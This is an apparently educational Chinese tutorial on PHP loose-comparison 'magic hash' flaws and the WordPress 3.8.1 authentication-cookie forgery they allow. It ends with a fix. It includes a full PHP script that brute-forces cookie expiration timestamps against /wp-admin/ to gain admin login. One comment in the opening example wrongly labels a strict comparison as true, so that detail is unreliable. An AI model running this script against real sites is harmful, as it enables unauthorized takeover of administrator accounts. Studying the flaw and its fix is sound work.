1 PHP弱類型
PHP是弱類型語言,所以變量會因為使用場景的不同自動進行類型轉換。PHP中用 == 以及 != 進行相等判斷時,會自動進行類型轉換,用 === 以及 !== 進行判斷時不會自動轉換類型。
1 <?php 2 $a = 3; 3 $b = '3vic'; 4 var_dump($a == $b);//true 5 var_dump($a != $b);//false 6 var_dump($a === $b);//true 7 var_dump($a !== $b);//false 8 ?>
說明:在PHP中字符串轉換成整型時,如果是數字開頭就會轉換成前面的數字('3vic' -> 3),如果不是數字開頭,那麼就會轉換成0('vic' -> 0)
2 WordPress代碼
1 <?php
2 // WordPress 3.8.1
3 if ($hmac != $hash) {}
4 // WordPress 3.8.2
5 if ( hash_hmac('md5', $hmac, $key) !== hash_hmac('md5', $hash, $key) ) {}
6 ?>
客戶端後台只驗證其中的一條Cookie,如下所示
wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly
其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式為 wordpress_ + md5(siteurl) 其中siteurl為WordPress的網址,此處網站地址為http://www.test.ichunqiu,md5加密後為c47f4a97d0321c1980bb76fc00d1e78f,其它部分也可省。
類型 用戶名 過期時間 登錄成功服務器端賦予客戶端的hash值
對應變量 $username $expiration $hmac cookies admin 1433403595 cf50f3b50eed94dd0fdc3d3ea2c7bbb
代碼 wp-includes/pluggable.php 第543-549行
1 <?php
2 $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);
3 $hash = hash_hmac('md5', $username . '|' . $expiration, $key);
4 if ( $hmac != $hash ) {
5 do_action('auth_cookie_bad_hash', $cookie_elements);
6 return false;
7 }
在代碼所使用的變量中,通過改變客戶端Cookie 的方式可控的有 $username 用戶名,$expiration 有效期,又因為其中用戶名是固定的,因此只有$expiration是可控的,所以我們可以從改變 $expiration 的方法來改變$hash。
有以下幾種可能使 $hmac == $hash 為真,字符串完全相等或者 $hmac 等於0的同時 $hash 為以字符開頭的字符串; 將客戶端的Cookie中 $hmac 值改為0,然後在if ( $hmac != $hash ) {的上面一行寫入var_dump($hmac);die();發現打印出來 $hmac 的結果是 string '0'而不是int 0, 那麼有沒有方法使字符串識別為整數呢,代碼如下:
1 <?php
2 var_dump('0' == '0e156464513131');//true
其中的 0e156464513131 會被識別為0乘以10的156464513131次方,還是得0;因此當 $hash 以0e開頭後面全是數字時就會與 $hmac 的值為 '0' 時相等,所以我們可以將客戶端的Cookie設置為類似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然後不斷更新過期時間(現在1433403595的位置)的方法來碰撞服務器端,一旦 $hash 的值為0e開頭後面全是數字即可驗證通過。假設碰撞成功,就修改浏覽器的Cookie,直接訪問後台地址,就可以成功登陸後台。
3 測試腳本
通過改變客戶端Cookie裡過期時間的值,不斷嘗試登錄後台,找出可以進入後台的時間戳,從而實現Cookie偽造登錄後台。
1 <?php
2 /*
3
4 本腳本用於WordPress 3.8.1 的cookie偽造漏洞檢測
5 傳入兩個值
6 WordPress 的主頁 $host
7 管理員用戶名 $root
8 */
9 header("Content-type:text/html;charset=utf-8");
10
11 $host = 'http://xxx.xxx.xxx';//主頁地址 結尾不帶'/'
12 $root = 'user';//管理員用戶名
13
14 $url = $host.'/wp-admin/';//後台管理地址
15 $sitehash=md5($host);
16
17 echo "\nWelcome\n\n";
18 //通過時間戳暴力破解cookie 實現偽造cookie
19 for($i=1500000000;$i<1600000000;$i++){
20 $cookie = "wordpress_".$sitehash."=".$root."|".$i."|0;";//組合構造cookie
21 $header = array(
22 "Content-Type:application/x-www-form-urlencoded",
23 'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
24 "Cookie:".$cookie,
25 );
26
27 $curl = curl_init(); // 啟動一個CURL會話
28 curl_setopt($curl, CURLOPT_URL, $url); // 要訪問的地址
29 curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); // 使用自動跳轉
30 curl_setopt($curl, CURLOPT_AUTOREFERER, 1); // 自動設置Referer
31 curl_setopt($curl, CURLOPT_HTTPGET, true); // 發送一個常規的Post請求
32 curl_setopt($curl, CURLOPT_HTTPHEADER, $header); // 讀取上面所儲存的Cookie信息
33 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); // 獲取的信息以文件流的形式返回
34 curl_setopt($curl, CURLOPT_HEADER, false);
35 curl_setopt($curl, CURLOPT_HEADER, 0);
36 curl_setopt($curl, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);//讓curl自動選擇版本
37 $tmpInfo = curl_exec($curl); // 執行操作
38 if (curl_errno($curl)) {
39 echo 'Errno'.curl_error($curl);
40 }
41 curl_close($curl); // 關閉CURL會話
42
43 //匹配結果
44 if(strstr($tmpInfo,'我們准備了幾個鏈接供您開始')){
45 echo "\n".'success : '.$cookie."\n\n";
46 break;
47 }else{
48 echo 'fail : '.$cookie."\n";
49 }
50
51 }
52 ?>
說明:理論上32位的MD5值以0e開頭的大概三億分之一,碰撞到可以利用的 $expiration 幾率極低。
5 修復方案
PHP 中使用的哈希比較函數,將其中的 == , != 分別更改為 === 和 !== 或者 將比較的兩個變量使用MD5再加密一次。
學習筆記:http://ichunqiu.com/course/167
